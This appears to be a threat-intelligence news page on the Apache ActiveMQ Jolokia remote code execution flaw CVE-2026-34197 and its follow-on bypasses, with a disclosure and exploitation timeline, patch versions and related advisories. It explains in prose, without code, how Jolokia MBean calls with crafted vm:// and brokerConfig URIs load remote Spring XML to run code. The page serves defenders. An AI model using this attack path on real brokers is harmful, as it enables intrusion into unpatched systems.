Apache ActiveMQ Jolokia MBean Flaw Enables Authenticated RCE
Apache disclosed CVE-2026-34197, an important-severity remote code execution flaw in Apache ActiveMQ Broker and Apache ActiveMQ Classic that lets authenticated users execute code through the Jolokia JMX-HTTP bridge exposed at /api/jolokia/. The default Jolokia access policy permits exec operations on ActiveMQ MBeans, allowing attackers to call methods such as BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String) with a crafted discovery URI.
The exploit abuses the VM transport brokerConfig parameter to load a remote Spring XML application context via ResourceXmlApplicationContext, and Spring may instantiate singleton beans before ActiveMQ validates the configuration, enabling arbitrary code execution in the broker JVM, including through methods like Runtime.exec(). Apache said the issue affects versions before 5.19.4 in the 5.x line and 6.0.0 through before 6.2.3 in the 6.x line, and recommends upgrading to 5.19.5 or 6.2.3; the vulnerability was reported by Naveen Sunkavally of Horizon3.ai.
How this story unfolded
9 events from the most recent confirmed update back to the earliest known activity.
Apache discloses CVE-2026-41044 in ActiveMQ Jolokia DestinationView MBean
Apache disclosed CVE-2026-41044, an important-severity authenticated remote code execution flaw in Apache ActiveMQ, Apache ActiveMQ Broker, and Apache ActiveMQ All. The issue lets an authenticated attacker craft a malicious broker name through the admin console and abuse the DestinationView MBean exposed by Jolokia to load a remote Spring XML context; Apache said affected versions should be upgraded to 5.19.6 or 6.2.5.
Apache discloses CVE-2026-40466 as bypass of ActiveMQ Jolokia RCE fix
Apache disclosed CVE-2026-40466, an important-severity vulnerability that can bypass the CVE-2026-34197 fix in Apache ActiveMQ when the activemq-http module is present. The flaw lets an authenticated attacker use HTTP Discovery transport to reach a malicious endpoint that returns a VM URI and ultimately load a remote Spring XML context for code execution; Apache advised upgrading to versions 5.19.6 or 6.2.5.
Shadowserver says 6,400 exposed ActiveMQ servers remain vulnerable
Shadowserver reported that more than 6,400 internet-exposed Apache ActiveMQ servers were still vulnerable to CVE-2026-34197 amid ongoing exploitation. It said the largest concentrations of exposed systems were in Asia, North America, and Europe, highlighting the scale of potential exposure.
CISA orders federal agencies to patch ActiveMQ flaw by April 30
After adding CVE-2026-34197 to the KEV catalog, CISA directed Federal Civilian Executive Branch agencies to remediate the Apache ActiveMQ vulnerability under Binding Operational Directive 22-01. The deadline for federal agencies to apply fixes or mitigations was set for 2026-04-30.
CISA adds ActiveMQ CVE-2026-34197 to KEV amid active exploitation
CISA added CVE-2026-34197 to its Known Exploited Vulnerabilities catalog and warned that the Apache ActiveMQ flaw is being actively exploited in the wild. The update elevated the issue from a disclosed and analyzed vulnerability to one with confirmed real-world exploitation.
Horizon3.ai publishes exploit details for ActiveMQ Jolokia RCE
Horizon3.ai released technical analysis of CVE-2026-34197, explaining exploitation via Jolokia's addNetworkConnector(String) to load a remote Spring XML file through vm:// and brokerConfig URLs. The post also noted that on ActiveMQ 6.0.0 through 6.1.1, chaining with CVE-2024-32114 can make the flaw effectively unauthenticated, and provided defender monitoring guidance for suspicious vm:// and brokerConfig=xbean:http activity.
Apache publishes remediation guidance for affected ActiveMQ versions
Apache stated the issue affects versions before 5.19.4 in the 5.x line and versions from 6.0.0 before 6.2.3 in the 6.x line. It advised users to upgrade to versions 5.19.5 or 6.2.3 to remediate the vulnerability.
Apache discloses CVE-2026-34197 affecting ActiveMQ Broker and Classic
Apache disclosed an important-severity vulnerability, CVE-2026-34197, in Apache ActiveMQ Broker and Apache ActiveMQ Classic. The flaw allows authenticated users to achieve code execution via Jolokia JMX-HTTP operations such as BrokerService.addNetworkConnector(String) and addConnector(String).
Horizon3.ai researcher reports ActiveMQ Jolokia RCE to Apache
Apache said CVE-2026-34197 was reported by Naveen Sunkavally of Horizon3.ai. The report concerned an authenticated remote code execution path through Jolokia-exposed ActiveMQ MBeans.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
22 references tracked. Mallory keeps watching after this page renders.
oss-sec: CVE-2026-41044: Apache ActiveMQ, Apache ActiveMQ Broker, Apache ActiveMQ All: Authenticated user can perform RCE via DestinationView MBean exposed by Jolokia
seclists.org
Open sourceoss-sec: CVE-2026-40466: Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ: Possible bypass of CVE-2026-34197 via HTTP discovery second-stage URI
seclists.org
Open sourceOver 6,400 Apache ActiveMQ servers at risk of ongoing attacks | brief | SC Media
scworld.com
Open sourceCVE-2026-3324 Log360 Auth Bypass Vulnerability | Horizon3.ai
horizon3.ai
Open sourceCVE-2026-34197: ActiveMQ RCE via Jolokia API : r/netsec
reddit.com
Open sourceCVE-2026-34197 - Apache ActiveMQ Broker, Apache ActiveMQ: Authenticated users could perform RCE via Jolokia MBeans
cvefeed.io
Open sourceoss-sec: CVE-2026-34197: Apache ActiveMQ Broker, Apache ActiveMQ: Authenticated users could perform RCE via Jolokia MBeans
seclists.org
Open source[no-title]
activemq.apache.org
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Apache ActiveMQ Jolokia Flaws Enable Zero-Credential Remote Code Execution
Active exploitation has been observed against an Apache ActiveMQ remote code execution chain involving the Jolokia management API. VulnCheck reported canary-network hits tied to `CVE-2026-34197`, which was added to CISA's Known Exploited Vulnerabilities catalog, and said attackers are also using an unauthenticated variant that chains `CVE-2024-32114` with `CVE-2026-34197` to achieve zero-credential RCE. According to the reporting, `CVE-2024-32114` removes authentication from the Jolokia endpoint in ActiveMQ versions `6.0.0` through `6.1.1`, exposing the management interface to unauthenticated abuse. Technical details published by Horizon3.ai describe the RCE path through the Jolokia API, while VulnCheck said observed payloads invoked `addNetworkConnector` through Jolokia during exploitation. One captured payload referenced a private IP address, indicating the attacker activity may have reused a lab or proof-of-concept configuration, but the exploitation itself was confirmed in the wild. The combined reporting indicates that exposed ActiveMQ instances with vulnerable Jolokia configurations face immediate risk of unauthenticated remote compromise.
May 25, 2026
Apache ActiveMQ Flaws Enable Path Traversal and TLS DoS
Apache disclosed two vulnerabilities affecting multiple **ActiveMQ** components, including Client, Broker, and bundled distributions. **CVE-2026-33227** is a low-severity pathname restriction flaw that lets an authenticated user manipulate a supplied `key` value to traverse the classpath in two cases: when creating a **STOMP** consumer and when browsing messages through the web console. Apache warned the issue could expose classpath resource loading and potentially be chained with another attack. The flaw affects the 5.x branch before **5.19.3** and the 6.x branch from **6.0.0** before **6.2.2**, but Apache said those initial fixes were incomplete on Windows because of path separator handling, and recommended upgrading instead to **5.19.4** or **6.2.3**. Apache also published **CVE-2026-39304**, an important denial-of-service flaw in ActiveMQ's **NIO SSL transports** caused by incorrect handling of **TLS 1.3 `KeyUpdate`** messages. A client can repeatedly trigger updates and exhaust broker memory in the SSL engine, causing out-of-memory crashes and service disruption. Apache added that related handshake handling is also broken for earlier TLS versions such as **TLS 1.2**, though those cases lead to hung connections rather than memory exhaustion. The DoS issue affects the 5.x branch before **5.19.4** and the 6.x branch from **6.0.0** before **6.2.4**; users are advised to upgrade to **5.19.5** or **6.2.4**.
Apr 9, 2026
Critical RCE Vulnerability in Apache ActiveMQ NMS AMQP Client
A critical remote code execution (RCE) vulnerability, identified as CVE-2025-54539, has been discovered in the Apache ActiveMQ NMS AMQP Client. This flaw is rated with a CVSS 3.1 score of 9.8, indicating its severe impact and ease of exploitation. The vulnerability arises from the deserialization of untrusted data within the NMS AMQP Client component, which can allow attackers to execute arbitrary code on the server. Security researchers have confirmed that successful exploitation of this vulnerability could lead to full server-side code execution, potentially granting attackers complete control over affected systems. The issue specifically affects deployments using the NMS AMQP Client, a component commonly integrated into enterprise messaging infrastructures. Organizations relying on Apache ActiveMQ for message brokering are at heightened risk if they utilize the vulnerable client library. The vulnerability can be exploited remotely, requiring no prior authentication, which significantly increases the attack surface and urgency for remediation. Security advisories recommend immediate patching or mitigation to prevent exploitation in the wild. The flaw was publicly disclosed on October 16, 2025, prompting rapid response from the Apache ActiveMQ development team and the broader security community. No reports of active exploitation have been confirmed at the time of disclosure, but the critical nature of the bug has led to widespread concern among enterprise users. Technical analysis indicates that the vulnerability stems from improper handling of serialized objects received over the AMQP protocol. Attackers can craft malicious payloads that, when processed by the vulnerable client, trigger arbitrary code execution. The Apache Software Foundation has released updated versions of the NMS AMQP Client to address the issue and urges all users to upgrade immediately. Security experts highlight the importance of reviewing all systems for the presence of the affected library and applying compensating controls where patching is not immediately feasible. The vulnerability underscores the ongoing risks associated with deserialization flaws in widely used open-source components. Organizations are advised to monitor for indicators of compromise and to review their application architectures for similar risks. The incident serves as a reminder of the critical need for secure coding practices and regular vulnerability management in enterprise environments.
Mar 21, 2026